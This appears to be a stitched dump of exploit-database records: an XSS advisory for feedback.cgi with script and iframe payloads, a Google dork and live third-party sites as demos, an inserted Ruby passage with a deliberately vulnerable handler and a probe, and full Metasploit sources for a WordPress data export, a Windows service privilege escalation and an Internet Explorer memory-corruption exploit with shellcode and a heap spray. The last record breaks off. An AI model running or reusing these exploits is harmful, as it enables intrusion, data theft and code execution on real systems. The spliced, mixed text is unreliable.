{"published": "2012-04-10T00:00:00", "id": "1337DAY-ID-18038", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:03:41", "bulletin": {"published": "2012-04-10T00:00:00", "id": "1337DAY-ID-18038", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.5, "modified": "2016-04-20T02:03:41"}}, "hash": "4d8b2ce800f2ab514607e3002795f97a0e8ace7995473c1a7ea98fd373489dbf", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T02:03:41", "edition": 1, "title": "FeedBack Form [feedback.cgi] <= XSS Vulnerability", "href": "http://0day.today/exploit/description/18038", "modified": "2012-04-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/18038", "references": [], "reporter": "Ryuzaki Lawlet", "sourceData": "##################################################\r\n# Exploit Title: FeedBack Form [feedback.cgi] <= XSS Vulnerability\r\n# Date: 10/04/2012\r\n# Author: Ryuzaki Lawlet\r\n# Web/Blog: http://justryuz.blogspot.com\r\n# Category: webapps\r\n# Tested on: Linux\r\n# Security:RISK: High\r\n# Google dork: inurl:/cgi-bin/feedback.cgi\r\n##################################################\r\n[~]Exploit/p0c :\r\n\r\nhttp://localhost:80/cgi-bin/feedback.cgi?[webapps]=[xss]\r\n\r\n[~]Proof of Concept:\r\n\r\n1.1\r\nhe issue can be exploited by an insert on the Created Object function with script code as value.\r\nThe result is the persistent execution out of the web application context.\r\n\r\nStrings: >\"<<iframe src=http://xxxxx.com/>3</iframe> OR >\"<script>alert(document.cookie)</script>\r\n\r\n\r\n[~]Dem0 :\r\n\r\nhttp://scully.cfa.harvard.edu/cgi-bin/feedback.cgi?U=[xss]\r\nhttp://www.europcar.bg/cgi-bin/feedback.cgi?LANG=[xss]\r\nhttp://www.europcarug.com/cgi-bin/feedback.cgi?LANG=[xss]\r\n\r\nFB : 
www.fb.me/justryuz\r\n+---------------------------------------------------+\r\n Greetz to :\r\n[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]\r\n[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ]\r\n[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]\r\n-----------------------------------------------------+\r\n\r\nCyberSEC \u00a9 2012 All rights reserved.\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "63a139ee8aed24ef05db1d4f4881098c", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fd11fa876fd89ec058dd024225397ad0", "key": "title"}, {"hash": "c33edea4bdcb9e1792acd2ed92a4bd1b", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "54f4c62b9978e320570d3441d5b36ce9", "key": "sourceHref"}, {"hash": "5a3da6b4e7187db53139dc0b8f6a1985", "key": "modified"}, {"hash": "5a3da6b4e7187db53139dc0b8f6a1985", "key": "published"}, {"hash": "a9b07c609f1f2f95050c13791b4e79fa", "key": "href"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "a578173db76fe46a73c37747a8ac7eee12225c640427d93047291382ea8060b9", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-01-09T13:33:01"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18038", "SECURITYVULNS:VULN:8172"]}], "modified": "2018-01-09T13:33:01"}, "vulnersScore": 0.1}, "type": "zdt", "lastseen": "2018-01-09T13:33:01", "edition": 2, "title": "FeedBack Form [feedback.cgi] <= XSS Vulnerability", "href": "https://0day.today/exploit/description/18038", "modified": 
"2012-04-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/18038", "references": [], "reporter": "Ryuzaki Lawlet", "sourceData": "##################################################\r\n# Exploit Title: FeedBack Form [feedback.cgi] <= XSS Vulnerability\r\n# Date: 10/04/2012\r\n# Author: Ryuzaki Lawlet\r\n# Web/Blog: http://justryuz.blogspot.com\r\n# Category: webapps\r\n# Tested on: Linux\r\n# Security:RISK: High\r\n# Google dork: inurl:/cgi-bin/feedback.cgi\r\n##################################################\r\n[~]Exploit/p0c :\r\n\r\nhttp://localhost:80/cgi-bin/feedback.cgi?[webapps]=[xss]\r\n\r\n[~]Proof of Concept:\r\n\r\n1.1\r\nhe issue can be exploited by an insert on the Created Object function with script code as value.\r\nThe result is the persistent execution out of the web application context.\r\n\r\nStrings: >\"<<iframe src=http://xxxxx.com/>3</iframe> OR >\"<script>alert(document.cookie)</script>\r\n\r\n\r\n[~]Dem0 :\r\n\r\nhttp://scully.cfa.harvard.edu/cgi-bin/feedback.cgi?U=[xss]\r\nhttp://www.europcar.bg/cgi-bin/feedback.cgi?LANG=[xss]\r\nhttp://www.europcarug.com/cgi-bin/feedback.cgi?LANG=[xss]\r\n\r\nFB : www.fb.me/justryuz\r\n+---------------------------------------------------+\r\n Greetz to :\r\n[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]\r\n[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ]\r\n[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]\r\n-----------------------------------------------------+\r\n\r\nCyberSEC \u00a9 2012 All rights reserved.\r\n\r\n\n\n# 0day.today [2018-01-09] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": 
"405e0976a8c5e66df44da304e682f259", "key": "href"}, {"hash": "5a3da6b4e7187db53139dc0b8f6a1985", "key": "modified"}, {"hash": "5a3da6b4e7187db53139dc0b8f6a1985", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "63a139ee8aed24ef05db1d4f4881098c", "key": "reporter"}, {"hash": "c25b30bcd1c629aa67b6f8f86c415d01", "key": "sourceData"}, {"hash": "8f4865cf55b21027eb68a1658249bacb", "key": "sourceHref"}, {"hash": "fd11fa876fd89ec058dd024225397ad0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
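The advisory above reports that feedback.cgi reflects a query parameter (the demo URLs use `U` and `LANG`) into the page without escaping, so a value such as `>"<script>alert(document.cookie)</script>` breaks out of the attribute and runs. The script itself is not on the page, so the Ruby below is an added example, not the original CGI or the reporter's code: a constructed stand-in that reproduces the reflection, the same handler hardened with `CGI.escapeHTML`, and a reflection probe of the kind a practitioner would run before trusting the advisory. The parameter name `LANG`, the form layout and the marker string are assumptions.

```ruby
require "cgi"

# Constructed stand-in for the vulnerable feedback.cgi (assumption: the real
# script is not on the page). It reproduces the behaviour the advisory
# describes: the LANG parameter lands in an attribute value unescaped.
def render_feedback_vulnerable(params)
  lang = params.fetch("LANG", "en")
  <<~HTML
    <html><body>
    <form action="/cgi-bin/feedback.cgi" method="post">
    <input type="hidden" name="LANG" value="#{lang}">
    <input type="text" name="email">
    </form>
    </body></html>
  HTML
end

# Hardened version: the reflected value is escaped for the HTML attribute
# context it is written into. CGI.escapeHTML maps < > & " ' to entities,
# so neither the quote nor the angle bracket in the payload survives.
def render_feedback_hardened(params)
  lang = CGI.escapeHTML(params.fetch("LANG", "en"))
  <<~HTML
    <html><body>
    <form action="/cgi-bin/feedback.cgi" method="post">
    <input type="hidden" name="LANG" value="#{lang}">
    <input type="text" name="email">
    </form>
    </body></html>
  HTML
end

# Marker chosen to be unlikely to appear in a page by chance (assumption).
PROBE_MARKER = "zqx9k"

# Reflection probe. `fetch` is any callable mapping a params hash to a
# response body, so the same probe runs offline against the stand-ins
# above or online against a real target wrapped in an HTTP client.
# The probe wraps the marker in the characters that close an attribute
# and open a tag; if they come back byte-for-byte, the reflection is raw
# and the advisory's payloads will execute.
def reflected_unescaped?(fetch, param)
  probe = %(">#{PROBE_MARKER}<)
  body = fetch.call(param => probe)
  body.include?(probe)
end

# Convenience for checking the advisory's own payload against a handler:
# returns true when the <script> tag is reflected unencoded.
def script_reflected?(fetch, param)
  payload = %(>"<script>alert(document.cookie)</script>)
  fetch.call(param => payload).include?("<script>")
end
```

Run the probe before the full payload: a marker-only probe keeps the test out of WAF signatures and out of other users' browsers, while still proving the `"` and `>` characters are not encoded.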
{"metasploit": [{"lastseen": "2019-12-15T19:54:41", "bulletinFamily": "exploit", "description": "This module allows you to export Wordpress data (such as the database, plugins, themes, uploaded files, etc) via the All-in-One Migration plugin without authentication.\n", "modified": "2018-10-01T17:59:09", "published": "2015-07-20T17:13:32", "id": "MSF:AUXILIARY/GATHER/WP_ALL_IN_ONE_MIGRATION_EXPORT", "href": "", "type": "metasploit", "title": "WordPress All-in-One Migration Export", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'WordPress All-in-One Migration Export',\n 'Description' => %q{\n This module allows you to export Wordpress data (such as the database, plugins, themes,\n uploaded files, etc) via the All-in-One Migration plugin without authentication.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'James Golovich', # Disclosure\n 'rastating' # Metasploit module\n ],\n 'References' =>\n [\n ['WPVDB', '7857'],\n ['URL', 'http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability']\n ],\n 'DisclosureDate' => 'Mar 19 2015'\n ))\n\n register_options(\n [\n OptInt.new('MAXTIME', [ true, 'The maximum number of seconds to wait for the export to complete', 300 ])\n ])\n end\n\n def check\n check_plugin_version_from_readme('all-in-one-wp-migration', '2.0.5')\n end\n\n def run\n print_status(\"Requesting website export...\")\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => wordpress_url_admin_ajax,\n 'vars_get' => { 'action' => 'router' },\n 'vars_post' => { 'options[action]' => 'export' }\n }, datastore['MAXTIME'])\n\n unless res\n fail_with(Failure::Unknown, \"#{peer} - No response from the target\")\n end\n\n if res.code != 
200\n fail_with(Failure::UnexpectedReply, \"#{peer} - Server responded with status code #{res.code}\")\n end\n\n if res.body.blank?\n print_status(\"Unable to download anything.\")\n print_status(\"Either the target isn't actually vulnerable, or\")\n print_status(\"it does not allow WRITE permission to the all-in-one-wp-migration/storage directory.\")\n else\n store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup')\n print_good(\"Backup archive saved to #{store_path}\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/wp_all_in_one_migration_export.rb"}, {"lastseen": "2019-12-04T09:44:54", "bulletinFamily": "exploit", "description": "This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure file or configuration permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. 
This will result in a new session when this succeeds.\n", "modified": "2017-07-24T13:26:21", "published": "2012-10-12T02:42:36", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/SERVICE_PERMISSIONS", "href": "", "type": "metasploit", "title": "Windows Escalate Service Permissions Local Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Services\n include Msf::Post::Windows::Accounts\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n ERROR = Msf::Post::Windows::Error\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Escalate Service Permissions Local Privilege Escalation',\n 'Description' => %q{\n This module attempts to exploit existing administrative privileges to obtain\n a SYSTEM session. If directly creating a service fails, this module will inspect\n existing services to look for insecure file or configuration permissions that may\n be hijacked. It will then attempt to restart the replaced service to run the\n payload. 
This will result in a new session when this succeeds.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'scriptjunkie' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => '5'\n },\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate'=> \"Oct 15 2012\"\n ))\n\n register_options([\n OptBool.new(\"AGGRESSIVE\", [ false, \"Exploit as many services as possible (dangerous)\", false ])\n ])\n\n end\n\n def execute_payload_as_new_service(path)\n success = false\n\n print_status(\"Trying to add a new service...\")\n service_name = Rex::Text.rand_text_alpha((rand(8)+6))\n if service_create(service_name, {:path => path, :display=>\"\"}) == ERROR::SUCCESS\n print_status(\"Created service... #{service_name}\")\n write_exe(path, service_name)\n if service_start(service_name) == ERROR::SUCCESS\n print_good(\"Service should be started! Enjoy your new SYSTEM meterpreter session.\")\n success = true\n end\n\n service_delete(service_name)\n else\n print_status(\"No privs to create a service...\")\n success = false\n end\n\n return success\n end\n\n def weak_service_permissions(service_name, service, path)\n success = false\n vprint_status(\"[#{service_name}] Checking for weak service permissions\")\n\n if (service_change_config(service_name, {:path => path}) == ERROR::SUCCESS)\n print_good(\"[#{service_name}] has weak configuration permissions - reconfigured to use exe #{path}\")\n print_status(\"[#{service_name}] Restarting service\")\n res = service_stop(service_name)\n\n if ((res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE))\n write_exe(path, service_name)\n if service_restart(service_name)\n print_good(\"[#{service_name}] Service restarted\")\n success = true\n else\n print_error(\"[#{service_name}] Unable to restart service\")\n end\n end\n\n unless (service_change_config(service_name, {:path => service[:path]}) 
== ERROR::SUCCESS)\n print_error(\"[#{service_name}] Failed to reset service to original path #{service[:path]}\")\n end\n end\n\n return success\n end\n\n def weak_file_permissions(service_name, service, path, token)\n success = false\n vprint_status(\"[#{service_name}] Checking for weak file permissions\")\n\n #get path to exe; parse out quotes and arguments\n original_path = service[:path]\n possible_path = expand_path(original_path)\n if (possible_path[0] == '\"')\n possible_path = possible_path.split('\"')[1]\n else\n possible_path = possible_path.split(' ')[0]\n end\n\n unless file?(possible_path)\n # If we cant determine it manually show the user and let them decide if manual inspection is worthwhile\n print_status(\"[#{service_name}] Cannot reliably determine path: #{service[:path]}\")\n end\n\n file_permissions = check_dir_perms(possible_path, token)\n\n if file_permissions && file_permissions.index('W')\n print_good(\"[#{service_name}] Write access to #{possible_path}\")\n\n begin\n status = service_status(service_name)\n no_access = false\n # Unless service is already stopped\n if status[:state] == SERVICE_STOPPED\n stopped = true\n else\n res = service_stop(service_name)\n stopped = ((res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE))\n end\n rescue RuntimeError => e\n vprint_error(\"[#{service_name}] #{e} \")\n no_access = true\n end\n\n if stopped or no_access\n begin\n if move_file(possible_path, possible_path+'.bak')\n write_exe(possible_path, service_name)\n print_status(\"[#{service_name}] #{possible_path} moved to #{possible_path+'.bak'} and replaced.\")\n if service_restart(service_name)\n print_good(\"[#{service_name}] Service restarted\")\n success = true\n else\n print_error(\"Unable to restart service\")\n end\n end\n rescue Rex::Post::Meterpreter::RequestError => e\n vprint_error(\"[#{service_name}] #{e}\")\n end\n else\n vprint_error(\"[#{service_name}] Unable to stop service\")\n end\n end\n\n return success\n end\n\n # If 
ServiceType is SERVICE_WIN32_SHARE_PROCESS then we need to\n # define the correct servicename.\n def write_exe(path, service_name=nil)\n vprint_status(\"[#{service_name}] Writing service executable to #{path}\")\n exe = generate_payload_exe_service({servicename: service_name, arch: get_payload_arch})\n write_file(path, exe)\n register_files_for_cleanup(path)\n end\n\n def get_payload_arch\n if payload.arch.include?(ARCH_X64)\n return ARCH_X64\n else\n return ARCH_X86\n end\n end\n\n def exploit\n filename = Rex::Text.rand_text_alpha((rand(8)+6)) + \".exe\"\n tempexe_name = Rex::Text.rand_text_alpha((rand(8)+6)) + \".exe\"\n\n dir_env = get_envs('SystemRoot', 'TEMP')\n sysdir = dir_env['SystemRoot']\n tmpdir = dir_env['TEMP']\n tempexe = tmpdir + \"\\\\\" + tempexe_name\n\n begin\n return if execute_payload_as_new_service(tempexe)\n rescue RuntimeError => e\n vprint_status(\"Unable to create a new service: #{e}\")\n end\n\n aggressive = datastore['AGGRESSIVE']\n\n print_status(\"Trying to find weak permissions in existing services..\")\n\n token = get_imperstoken\n each_service do |serv|\n service_name = serv[:name]\n service = service_info(service_name)\n begin\n return if weak_file_permissions(service_name, service, tempexe, token) and not aggressive\n return if weak_service_permissions(service_name, service, tempexe) and not aggressive\n rescue RuntimeError => e\n vprint_status(\"[#{serv[:name]}] #{e}\")\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/service_permissions.rb"}, {"lastseen": "2019-11-20T21:02:28", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the data binding feature of Internet Explorer. In order to execute code reliably, this module uses the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. 
This method is used to create a fake vtable at a known location with all methods pointing to our payload. Since the .text segment of the .NET DLL is non-writable, a prefixed code stub is used to copy the payload into a new memory segment and continue execution from there.\n", "modified": "2019-05-23T12:01:21", "published": "2010-02-10T20:41:07", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS08_078_XML_CORRUPTION", "href": "", "type": "metasploit", "title": "MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n #\n # Superceded by ms10_018_ie_behaviors, disable for BrowserAutopwn\n #\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n #\t:ua_name => HttpClients::IE,\n #\t:ua_minver => \"7.0\",\n #\t:ua_maxver => \"7.0\",\n #\t:javascript => true,\n #\t:os_name => OperatingSystems::Match::WINDOWS,\n #\t:vuln_test => nil, # no way to test without just trying it\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption',\n 'Description' => %q{\n This module exploits a vulnerability in the data binding feature of Internet\n Explorer. In order to execute code reliably, this module uses the .NET DLL\n memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n used to create a fake vtable at a known location with all methods pointing\n to our payload. 
Since the .text segment of the .NET DLL is non-writable, a\n prefixed code stub is used to copy the payload into a new memory segment and\n continue execution from there.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'hdm'\n ],\n 'References' =>\n [\n ['CVE', '2008-4844'],\n ['OSVDB', '50622'],\n ['BID', '32721'],\n ['MSB', 'MS08-078'],\n ['URL', 'https://web.archive.org/web/20080913064223/http://taossa.com/archive/bh08sotirovdowd.pdf'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'Compat' =>\n {\n 'ConnectionType' => '-find',\n },\n 'StackAdjustment' => -3500,\n\n # Temporary stub virtualalloc() + memcpy() payload to RWX page\n 'PrependEncoder' =>\n \"\\xe8\\x56\\x00\\x00\\x00\\x53\\x55\\x56\\x57\\x8b\\x6c\\x24\\x18\\x8b\\x45\\x3c\"+\n \"\\x8b\\x54\\x05\\x78\\x01\\xea\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\xe3\\x32\"+\n \"\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xff\\xfc\\x31\\xc0\\xac\\x38\\xe0\\x74\\x07\"+\n \"\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\\xf2\\x3b\\x7c\\x24\\x14\\x75\\xe1\\x8b\\x5a\\x24\"+\n \"\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\\xe8\"+\n \"\\xeb\\x02\\x31\\xc0\\x5f\\x5e\\x5d\\x5b\\xc2\\x08\\x00\\x5e\\x6a\\x30\\x59\\x64\"+\n \"\\x8b\\x19\\x8b\\x5b\\x0c\\x8b\\x5b\\x1c\\x8b\\x1b\\x8b\\x5b\\x08\\x53\\x68\\x54\"+\n \"\\xca\\xaf\\x91\\xff\\xd6\\x6a\\x40\\x5e\\x56\\xc1\\xe6\\x06\\x56\\xc1\\xe6\\x08\"+\n \"\\x56\\x6a\\x00\\xff\\xd0\\x89\\xc3\\xeb\\x0d\\x5e\\x89\\xdf\\xb9\\xe8\\x03\\x00\"+\n \"\\x00\\xfc\\xf3\\xa4\\xff\\xe3\\xe8\\xee\\xff\\xff\\xff\"\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Dec 07 2008',\n 'DefaultTarget' => 0))\n end\n\n def on_request_uri(cli, request)\n @state ||= {}\n\n ibase = 0x13370000\n vaddr = ibase + 0x2065\n\n uri,token = request.uri.split('?', 2)\n\n\n if(token)\n token,trash = token.split('=')\n end\n\n if !(token and @state[token])\n\n 
print_status(\"Sending #{self.name} init HTML\")\n token = rand_text_numeric(32)\n if (\"/\" == get_resource[-1,1])\n dll_uri = get_resource[0, get_resource.length - 1]\n else\n dll_uri = get_resource\n end\n dll_uri << \"/generic-\" + Time.now.to_i.to_s + \".dll\"\n\n html = <<-EOS\n<html>\n<head>\n<script language=\"javascript\">\n function forward() {\n window.location = window.location + '?#{token}';\n }\n\n function start() {\n setTimeout(\"forward()\", 2000);\n }\n</script>\n</head>\n<body onload=\"start()\">\n <object classid=\"#{dll_uri}?#{token}#GenericControl\">\n <object>\n</body>\n</html>\nEOS\n @state[token] = :start\n # Transmit the compressed response to the client\n send_response(cli, html, { 'Content-Type' => 'text/html' })\n return\n end\n\n if (uri.match(/\\.dll/i))\n\n print_status(\"Sending DLL\")\n\n return if ((p = regenerate_payload(cli)) == nil)\n\n # First entry points to the table of pointers\n vtable = [ vaddr + 4 ].pack(\"V\")\n cbase = ibase + 0x2065 + (256 * 4)\n\n # Build a function table\n 255.times { vtable << [cbase].pack(\"V\") }\n\n # Append the shellcode\n vtable << p.encoded\n send_response(\n cli,\n Msf::Util::EXE.to_dotnetmem(ibase, vtable),\n {\n 'Content-Type' => 'application/x-msdownload',\n 'Connection' => 'close',\n 'Pragma' => 'no-cache'\n }\n )\n @state[token] = :dll\n return\n end\n\n\n\n html = \"\"\n data = \"==gPOFEUT9CPK4DVYVEV9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQ\" +\n \"EBiTBB1U8ogPM1EVI1zUBRVQNJ1TGFEVBREID1DRMZUQUFERgk0I9MkUTFEVBREI\" +\n \"OFEUTxjC+QFWFRVPTFEVB1kUPZUQUFERgMUPExkRBRVQEBSSj0zQSNVQUFERg4UQ\" +\n \"QNFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U\" +\n \"8ogPM1EWvwjPJ1DRJBCTNhFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREI\" +\n \"JNSPDJ1UBRVQEBiVJREP\"\n data = data.reverse.unpack(\"m*\")[0]\n\n\n #\n # .NET DLL MODE\n #\n if(@state[token] == :dll)\n print_status(\"Sending exploit HTML (Using .NET DLL)\")\n\n addr_a,addr_b = [vaddr].pack(\"V\").unpack(\"v*\").map{|v| 
\"&##{v};\" }\n bxml = Rex::Text.to_hex(%Q|\n<XML ID=I>\n <X>\n <C>\n <![CDATA[\n <image\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n >\n ]]>\n </C>\n </X>\n</XML>\n\n#{data}\n\n<script>\n setTimeout('window.location.reload(true);', 250);\n</script>\n |, '%')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_start = rand_text_alpha(rand(100) + 1)\n\n html = %Q|<html>\n<head>\n<script>\n function #{var_start}() {\n var #{var_unescape} = unescape;\n document.write(#{var_unescape}('#{bxml}'));\n }\n</script>\n</head>\n<body onload=\"#{var_start}()\">\n</body>\n</html>\n |\n\n #\n # HEAP SPRAY MODE\n #\n else\n print_status(\"Sending exploit HTML (Using Heap Spray)\")\n\n addr_a,addr_b = [0x0c0c0c0c].pack(\"V\").unpack(\"v*\").map{|v| \"&##{v};\" }\n bxml = Rex::Text.to_hex(%Q|\n<XML ID=I>\n <X>\n <C>\n <![CDATA[\n <image\n 
SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n >\n ]]>\n </C>\n </X>\n</XML>\n\n#{data}\n\n<script>\n setTimeout('window.location.reload(true);', 1000);\n</script>\n |, '%')\n\n var_memory = rand_text_alpha(rand(100) + 1)\n var_boom = rand_text_alpha(rand(100) + 1)\n var_body = rand_text_alpha(rand(100) + 1)\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n var_spray = rand_text_alpha(rand(100) + 1)\n var_start = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n\n rand_html = rand_text_english(rand(400) + 500)\n\n html = <<-EOS\n<html>\n<head>\n<script>\n var #{var_memory} = new Array();\n var #{var_unescape} = unescape;\n\n\n function #{var_boom}() {\n document.getElementById('#{var_body}').innerHTML = #{var_unescape}('#{bxml}');\n }\n\n function #{var_start}() {\n\n var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');\n\n var #{var_spray} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\n\n do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );\n\n for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};\n\n setTimeout('#{var_boom}()', 1000);\n }\n</script>\n</head>\n<body onload=\"#{var_start}()\" id=\"#{var_body}\">\n#{rand_html}\n</body>\n</html>\nEOS\n\n end\n\n # Transmit the compressed response to the client\n send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": 